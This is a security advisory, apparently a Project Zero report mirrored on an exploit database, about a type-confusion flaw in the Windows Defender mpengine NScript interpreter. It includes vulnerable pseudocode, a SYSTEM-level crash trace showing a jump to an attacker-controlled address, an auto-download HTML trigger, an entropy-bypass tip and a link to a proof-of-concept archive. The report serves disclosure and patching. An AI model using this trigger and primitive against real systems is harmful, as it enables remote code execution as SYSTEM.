|
||||
The core component of MsMpEng responsible for scanning and analysis is called mpengine. Mpengine is a vast and complex attack surface, comprising of handlers for dozens of esoteric archive formats, executable packers and cryptors, full system emulators and interpreters for various architectures and languages, and so on. All of this code is accessible to remote attackers.
|
||||
|
||||
NScript is the component of mpengine that evaluates any filesystem or network activity that looks like JavaScript. To be clear, this is an unsandboxed and highly privileged JavaScript interpreter that is used to evaluate untrusted code, by default on all modern Windows systems. This is as surprising as it sounds.
|
||||
|
||||
We have written a tool to access NScript via a command shell for testing, allowing us to explore and evaluate it:
|
||||
|
||||
$ mpscript
|
||||
main(): Please wait, initializing engine...
|
||||
main(): Ready, type javascript (history available, use arrow keys)
|
||||
> 6 * 9
|
||||
JavaScriptLog(): 54
|
||||
> document.location.hostname
|
||||
JavaScriptLog(): www.myserver.com
|
||||
> "abcd" + String.fromCharCode(0x3f)
|
||||
JavaScriptLog(): abcd?
|
||||
> /[y]e+(s|S)/.exec("yes")[0] // C++ regex engine running unsandboxed as SYSTEM on attacker controlled REGEX?
|
||||
JavaScriptLog(): yes
|
||||
> for (i in document) log(i)
|
||||
JavaScriptLog(): appendChild
|
||||
JavaScriptLog(): attributes
|
||||
JavaScriptLog(): childNodes
|
||||
JavaScriptLog(): createElement
|
||||
JavaScriptLog(): createTextNode
|
||||
JavaScriptLog(): getElementById
|
||||
JavaScriptLog(): getElementsByTagName
|
||||
JavaScriptLog(): write
|
||||
JavaScriptLog(): writeln
|
||||
JavaScriptLog(): referrer
|
||||
JavaScriptLog(): cookie
|
||||
JavaScriptLog(): location
|
||||
JavaScriptLog(): undefined
|
||||
> window.ScriptEngineBuildVersion
|
||||
JavaScriptLog(): [object Function]
|
||||
> window.ScriptEngineBuildVersion()
|
||||
JavaScriptLog(): 8831
|
||||
|
||||
We have discovered that the function JsDelegateObject_Error::toString() reads the "message" property from the this object, but fails to validate the type of the property before passing it to JsRuntimeState::triggerShortStrEvent().
|
||||
|
||||
In pseudocode, the code does something like this:
|
||||
|
||||
prophash = JsObject::genPropHash("message", 0);
|
||||
RuntimeState::getThisPtr(&thisptr)
|
||||
|
||||
if (JsObject::get(thisptr, prophash, &message)) {
|
||||
JsRuntimeState::triggerShortStrEvent("error_tostring", message);
|
||||
}
|
||||
|
||||
|
||||
The method assumes that message is a string, but it can be of any type, so this type confusion allows an attacker to pass arbitrary other objects. JsRuntimeState::triggerShortStrEvent() calls JsString::numBytes() on the passed object, which will invoke a method from the object's vtable.
|
||||
|
||||
int __fastcall JsString::numBytes(JsString this)
|
||||
{
|
||||
if ( this == 0x12 )
|
||||
return 0;
|
||||
if ( (this & 0x12) == 0x12 )
|
||||
return this >> 5;
|
||||
return this->vtbl->GetLength(this);
|
||||
}
|
||||
|
||||
Nscript supports "short" strings, with length and values contained in the handle and "long" strings with out-of-line memory. If the string is "long" (or appears to be due to type confusion), a vtable call is made to retrieve the length.
|
||||
|
||||
Integer handles are represented as four-byte values with the final bit set to one by the engine. The integer itself is left shifted by one bit, and the final bit set to create the handle. Handles to most objects, including strings are represented as the value of the pointer to the object with no modification. Therefore, this type confusion allows an integer to be specified and treated as pointer (though the bits need to shifted to get the correct value in the handle, and only odd pointer values are possible).

To reproduce this vulnerability, download the attached testcase. The debugging session below was captured after visiting a website that did this:

<a href="testcase.txt" download id=link>
<script>
document.getElementById("link").click();
</script>

3: kd> !process
PROCESS 8805fd28 SessionId: 0 Cid: 0afc Peb: 7ffdf000 ParentCid: 01c8
DirBase: bded14e0 ObjectTable: bfb99640 HandleCount: 433.
Image: MsMpEng.exe
3: kd> !token -n
_EPROCESS 8805fd28, _TOKEN 00000000
TS Session ID: 0
User: S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)

3: kd> .lastevent
Last event: Access violation - code c0000005 (first chance)
debugger time: Fri May 5 18:22:14.740 2017 (UTC - 7:00)
3: kd> r
eax=00000010 ebx=1156c968 ecx=41414141 edx=115730f8 esi=68bd9100 edi=41414141
eip=68b1f5f2 esp=0208e12c ebp=0208e134 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
mpengine!FreeSigFiles+0xec822:
001b:68b1f5f2 8b07 mov eax,dword ptr [edi] ds:0023:41414141=????????
3: kd> lmv mmpengine
start end module name
68790000 6917a000 mpengine (export symbols) mpengine.dll
Loaded symbol image file: mpengine.dll
Image path: c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{1C2B7358-645B-41D0-9E79-5FA3E5C4EB51}\mpengine.dll
Image name: mpengine.dll
Timestamp: Thu Apr 06 16:05:37 2017 (58E6C9C1)
CheckSum: 00A1330D
ImageSize: 009EA000
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
3: kd> u
mpengine!FreeSigFiles+0xec822:
001b:68b1f5f2 8b07 mov eax,dword ptr [edi]
001b:68b1f5f4 56 push esi
001b:68b1f5f5 8b7008 mov esi,dword ptr [eax+8]
001b:68b1f5f8 8bce mov ecx,esi
001b:68b1f5fa ff15c0450e69 call dword ptr [mpengine!MpContainerWrite+0x35f3a0 (690e45c0)]
001b:68b1f600 8bcf mov ecx,edi
001b:68b1f602 ffd6 call esi <--- Jump to attacker controlled address
001b:68b1f604 5e pop esi

Before executing JavaScript, mpengine uses a number of heuristics to decide if evaluation is necessary. One such heuristic estimates file entropy before deciding whether to evaluate any JavaScript, but we've found that appending some complex comments is enough to trigger evaluation.

The attached proof of concept demonstrates this, but please be aware that downloading it will immediately crash MsMpEng in its default configuration and possibly destabilize your system. Extra care should be taken when sharing this report with other Windows users via Exchange, web services based on IIS, and so on.

As mpengine will unpack arbitrarily deeply nested archives and supports many obscure and esoteric archive formats (such as Amiga ZOO and MagicISO UIF), there is no practical way to identify an exploit at the network level, and administrators should patch as soon as is practically possible.
We have verified that on Windows 10, adding a blanket exception for C:\ is enough to prevent automatic scanning of filesystem activity (you can still initiate manual scans, but it seems prudent to do so on trusted files only, making the action pointless).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41975.zip